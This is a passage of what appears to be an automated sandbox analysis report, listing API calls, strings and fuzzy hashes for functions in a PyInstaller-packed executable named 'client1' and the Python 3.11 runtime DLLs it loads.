                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$Arg_$ArgumentCompareReadyStringWith$CheckPositionalSubtypeType_
                                                    • String ID: argument 1$argument 2$normalize$str
                                                    • API String ID: 3621440800-1320425463
                                                    • Opcode ID: 94348148c340fa5468beab9ef1746397c69e42e894d14843631ab3fa4ea44381
                                                    • Instruction ID: 977e28c51aae911f95894bd0b3211ebb9eff69e3c0b86fb62f907b7e16e30984
                                                    • Opcode Fuzzy Hash: 94348148c340fa5468beab9ef1746397c69e42e894d14843631ab3fa4ea44381
                                                    • Instruction Fuzzy Hash: 052181E1B1A687D1EA62AF35E44817A2368AF04B98F5A42B5CE5D476E4CF2CD447C330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_$ArgumentReadyUnicode_$CheckPositional
                                                    • String ID: argument 1$argument 2$is_normalized$str
                                                    • API String ID: 396090033-184702317
                                                    • Opcode ID: c961abb42e83fbff4e8e9473619491438f798cfd5e47330d0c83c04a8f602896
                                                    • Instruction ID: 0de68c8757105bee458038aa11aabf05e44d0da929d51482c2fd4f982031407d
                                                    • Opcode Fuzzy Hash: c961abb42e83fbff4e8e9473619491438f798cfd5e47330d0c83c04a8f602896
                                                    • Instruction Fuzzy Hash: 3121F2E0B0AA97C5E7529F35E8442B62368AF04B98F5541B1CE6D072E4CFACE447C330
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F6274D7
                                                    • FormatMessageW.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F627506
                                                    • WideCharToMultiByte.KERNEL32 ref: 00007FF79F62755C
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                    • API String ID: 2920928814-2573406579
                                                    • Opcode ID: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                    • Instruction ID: 3f8bcb08a4949239cf5d499b2be8be6b3ea2e7926f57f98021b190ace911d838
                                                    • Opcode Fuzzy Hash: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                    • Instruction Fuzzy Hash: 85213E71A18B8282E730BF31EC406E6E26BFB88394FC40135D56D926A4EF7CE145C721
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_end
                                                    • String ID:
                                                    • API String ID: 227901110-0
                                                    • Opcode ID: acc77d8fae5fb38cfc5f211597638600039f1ca8324b1c8e61e62cff5070e8e8
                                                    • Instruction ID: 327e7bb141525bff48f7bc5a79bdd6f5eab1526651c3e44871516b97b5bf92b8
                                                    • Opcode Fuzzy Hash: acc77d8fae5fb38cfc5f211597638600039f1ca8324b1c8e61e62cff5070e8e8
                                                    • Instruction Fuzzy Hash: 0B31DBB2A0AA0281E7568F75D59837C63A4EF45FBDF198334CE3A022F5CF6D94858300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$f$p$p$f
                                                    • API String ID: 3215553584-1325933183
                                                    • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                    • Instruction ID: 3ec97ae38e25c2ae4738682ddf7c8afc54605f162cdf39b16da1d5dd63216689
                                                    • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                    • Instruction Fuzzy Hash: 3A129661E0C3C396FB30BA24E1542FEF69BEB80758FD44035D6A9465C9DBBCE5488B60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFromLong_Ssize_t$DivideNumber_SubtypeTrueType_
                                                    • String ID: float$ratio
                                                    • API String ID: 2782116801-972954435
                                                    • Opcode ID: 4831a3dffaef211fbe30ebf8b367fcef31285f64da05e03ef7d76df15abe5e82
                                                    • Instruction ID: 87af68b0ce889a9b49e9fe2a674cf8e7685d5b3d09c907c43cafb120554cc2dc
                                                    • Opcode Fuzzy Hash: 4831a3dffaef211fbe30ebf8b367fcef31285f64da05e03ef7d76df15abe5e82
                                                    • Instruction Fuzzy Hash: 9D41B8A1E4BA1281FA268B36E58423D63A0EF45BE4F088135DE7D07BF4DF2DE4558301
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                    • String ID: CreateProcessW$Error creating child process!
                                                    • API String ID: 2895956056-3524285272
                                                    • Opcode ID: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                    • Instruction ID: d380c7af5ec119b0fcd4c139edf9bb9be3613d7e6ca27189c727d82b26037fa6
                                                    • Opcode Fuzzy Hash: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                    • Instruction Fuzzy Hash: 2141F032A087C281DA20BB70E8552EAE3A9FB95364F900735E6BD47AD5DF7CD0548B50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Object_$DeallocErr_Object$ArgsAttrCallInstance
                                                    • String ID: ratio
                                                    • API String ID: 2838319001-4234197119
                                                    • Opcode ID: e50460fa4b39084320fee5246d3b49e5819d27571d8f2140336073f1f100eac0
                                                    • Instruction ID: a1677c7c0a53864dd6dc2752104728c8abbf8f8e0839a5dca493f20820d67690
                                                    • Opcode Fuzzy Hash: e50460fa4b39084320fee5246d3b49e5819d27571d8f2140336073f1f100eac0
                                                    • Instruction Fuzzy Hash: 8F1115E1A0BA0385EA5A9B7BE99453C63A0AF48BD0F08D139CC2E57374EF2CE4558311
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FreeMem_$SubtypeType_$ContextObject_Var_
                                                    • String ID:
                                                    • API String ID: 2752330588-0
                                                    • Opcode ID: e7f4ca843fc1fc5100b4f91760ec1170ac95024235bc5740df5f1bd4fe44d974
                                                    • Instruction ID: e86eb9662184adae16c74a90496a726e33f20825b5a12516c5da5b9cf20d7e6a
                                                    • Opcode Fuzzy Hash: e7f4ca843fc1fc5100b4f91760ec1170ac95024235bc5740df5f1bd4fe44d974
                                                    • Instruction Fuzzy Hash: 605163B1A0AA43C5EA168F3AD85417E6B98AF45F90F0850B6DE4D067A0DF3CE54B8721
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_end
                                                    • String ID:
                                                    • API String ID: 227901110-0
                                                    • Opcode ID: 3eece61ab72cf83c1d2f612cf55ea204bf08e9b005993bf916930f8e855fefe8
                                                    • Instruction ID: 3b528b72adfd9153db3ed582075b7a557fbcecd9a0b5a595cea3e5331e5d53f5
                                                    • Opcode Fuzzy Hash: 3eece61ab72cf83c1d2f612cf55ea204bf08e9b005993bf916930f8e855fefe8
                                                    • Instruction Fuzzy Hash: 8A31BCB6A0A60281EB668F76E59833C63A4EF54FB9F158334CE7D026E4CF6DD445C280
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$Ready
                                                    • String ID: Python int too large to convert to C ssize_t$string index out of range
                                                    • API String ID: 628428347-644864186
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$Arg_ArgumentFromReadyStringSubtypeType_
                                                    • String ID: a unicode character$argument$category
                                                    • API String ID: 2803103377-2068800536
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF79F63E152,?,?,000001692C638C68,00007FF79F63A223,?,?,?,00007FF79F63A11A,?,?,?,00007FF79F635472), ref: 00007FF79F63DF34
                                                    • GetProcAddress.KERNEL32(?,00000000,?,00007FF79F63E152,?,?,000001692C638C68,00007FF79F63A223,?,?,?,00007FF79F63A11A,?,?,?,00007FF79F635472), ref: 00007FF79F63DF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    APIs
                                                      • Part of subcall function 00007FFBAA6FE780: PyContextVar_Get.PYTHON311(?,?,?,?,00007FFBAA6F1345), ref: 00007FFBAA6FE792
                                                    • PyArg_ParseTupleAndKeywords.PYTHON311 ref: 00007FFBAA709124
                                                    • _PyObject_New.PYTHON311 ref: 00007FFBAA70914E
                                                      • Part of subcall function 00007FFBAA709224: PyObject_CallObject.PYTHON311(?,?,?,00007FFBAA708D84,?,?,?,00007FFBAA6FE7B4,?,?,?,?,00007FFBAA6F1345), ref: 00007FFBAA709236
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA709552
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA7095BC
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA7095ED
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA709618
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA709644
                                                      • Part of subcall function 00007FFBAA709530: PyList_Size.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA7096BF
                                                      • Part of subcall function 00007FFBAA709530: PyList_GetItem.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA7096D9
                                                    • PyErr_SetString.PYTHON311 ref: 00007FFBAA709206
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAA709217
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAA715AB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Long_Ssize_t$DeallocList_Object_$Arg_CallContextErr_ItemKeywordsObjectParseSizeStringTupleVar_
                                                    • String ID: optional argument must be a context$|OOOOOOOOO
                                                    • API String ID: 3005893858-3543545731
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$Arg_ArgumentFromReadyStringSubtypeType_
                                                    • String ID: a unicode character$argument$bidirectional
                                                    • API String ID: 2803103377-2110215792
                                                    APIs
                                                    • _PyObject_New.PYTHON311(?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD3DB
                                                      • Part of subcall function 00007FFBAA6FD550: isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD654
                                                      • Part of subcall function 00007FFBAA6FD550: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD687
                                                      • Part of subcall function 00007FFBAA6FD550: strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD69F
                                                      • Part of subcall function 00007FFBAA6FD550: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD6A8
                                                    • PyErr_SetObject.PYTHON311 ref: 00007FFBAA6FD4ED
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAA6FD506
                                                    • PyErr_SetString.PYTHON311 ref: 00007FFBAA71388E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err__errno$DeallocObjectObject_Stringisdigitstrtoll
                                                    • String ID: internal error in flags_as_exception
                                                    • API String ID: 2528243369-882050087
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F62769F
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F6276EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    • API String ID: 626452242-27947307
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
